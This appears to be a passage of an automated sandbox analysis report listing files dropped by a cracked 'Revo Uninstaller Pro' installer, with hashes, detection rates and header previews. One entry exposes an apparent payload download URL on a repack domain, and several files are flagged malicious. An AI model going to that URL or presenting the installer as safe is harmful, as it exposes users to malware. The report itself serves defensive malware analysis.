                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):419886
                                                                                                                                                                          Entropy (8bit):7.320460842483817
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                                                          MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                                                          SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                                                          SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                          Entropy (8bit):4.036006945330954
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                                                          MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                                                          SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                                                          SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                                                          SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):174444
                                                                                                                                                                          Entropy (8bit):7.726875563462969
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:w+pMHMfwXZawAuL45TUQ+DjasBtroikmMUx+/fmmOUpIv1BUxXmXUzyh9F:w+p9wXMwYUQ+RAzG+/a0WXPT
                                                                                                                                                                          MD5:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                                                          SHA1:7A7994CD05C4D93FC8B2897CF061E70F6D43ED7E
                                                                                                                                                                          SHA-256:1C668B85525A1F2C0634631472DFDECAFEE965AEC087D37BCEB737C1D7B433A1
                                                                                                                                                                          SHA-512:9A17BD9C9FC0E30EFDA6E7F091758FA3D3F23E41BF17E68C1D9F4F88C9807F328CE68EFCE1B08937C67FC786838215B600C7347FD705EE5DDEFEF8EA7AC15FD3
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@.......................... ............@..............................................C...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):3.8234820419345263
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:HoXxl+vlXEovFcdhahaUiIJpylVrg5u4ML:HiKqD6TiIJMX48
                                                                                                                                                                          MD5:DEC435FEBCB6AFA7D48712C6B7B7F797
                                                                                                                                                                          SHA1:ACF1290A64873D6286B9A6845291F87AC0C5D383
                                                                                                                                                                          SHA-256:CF0BF3E2326C6D6C60C0EB72F23D2F57E02C50B1C08012EC0F3490AD7992F85A
                                                                                                                                                                          SHA-512:84698DF0E436B4EF7B24AD2D59F2FC6AA960723D5B430C069B788C875332F8C36677A08C9DFD25ECBAE1A3D1472CC8D6A339CC3F8D00A7B4D7815B25F3AD8898
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):4.179276254881405
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:9lE1kJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:s1kgbmAFbrEfwcwA
                                                                                                                                                                          MD5:03E71E2F27CB3C60F2515B378D5934A7
                                                                                                                                                                          SHA1:E9B43186EB393D73EACC10E5F7F116E78FDC0CE1
                                                                                                                                                                          SHA-256:242603B8262926CB598FF0F8094775CF6A4EC4FA5DC8191B9CF226888AF9F96E
                                                                                                                                                                          SHA-512:E27B5BE6E99FD9295FEC301BCBB286175D833E51C9E0E651BB746FA6B8E4E196BF85115CD94B99D18E01D93D6699F111AA0EA9C240975E07BE20EAA3E4D6D550
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):3.8127911901112443
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:Mr6Nzec6u9cNl0aUxJiHKDVthKheoH0vs7wwGI8Ean8e++y/rnpqnfbTqFBrec22:Mm8c6xl0v42h1lUnMnz/Gy8KqiSD
                                                                                                                                                                          MD5:FC176015020E80F8266906905D30536D
                                                                                                                                                                          SHA1:AB5FB655990467D9158B52099B78F9FB63FF12EE
                                                                                                                                                                          SHA-256:475853E54B9B40AB85E3D7FEED1C3EE9CC4E34444E2068B63627A9235E5B6333
                                                                                                                                                                          SHA-512:378F736359052FC76088BCE0FAF9EE987EEC67BB3AC065E9FD8E93FA8CDFC808BB13B27A4A3BDF13FEF652A895885FBD36EF1514571184E31E98C075BA404FB5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):4.191279757299406
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oamCMUJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:CpUgbmAFbrEfwcwA
                                                                                                                                                                          MD5:7B91A8BD71A1534BED881C524474AA66
                                                                                                                                                                          SHA1:4C85276D711DD163E47236E139271D4AB6BDA280
                                                                                                                                                                          SHA-256:3392CF7BA5655BC4624D133947E13683D4447FAFB1EA6926F070FC3FD3C499B1
                                                                                                                                                                          SHA-512:D17F48F339C4C79CE4118D59B22DF283FDF8DEE288BFEFCD7374663C47843C8F311B30A3D5853F62C4F10895197F9C9F6B122FE27B0B67F1D72EA4B87289A9D0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):244224
                                                                                                                                                                          Entropy (8bit):5.312608585453437
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                                                          MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                                                          SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                                                          SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                                                          SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5632
                                                                                                                                                                          Entropy (8bit):3.817430038996001
                                                                                                                                                                          Encrypted:false
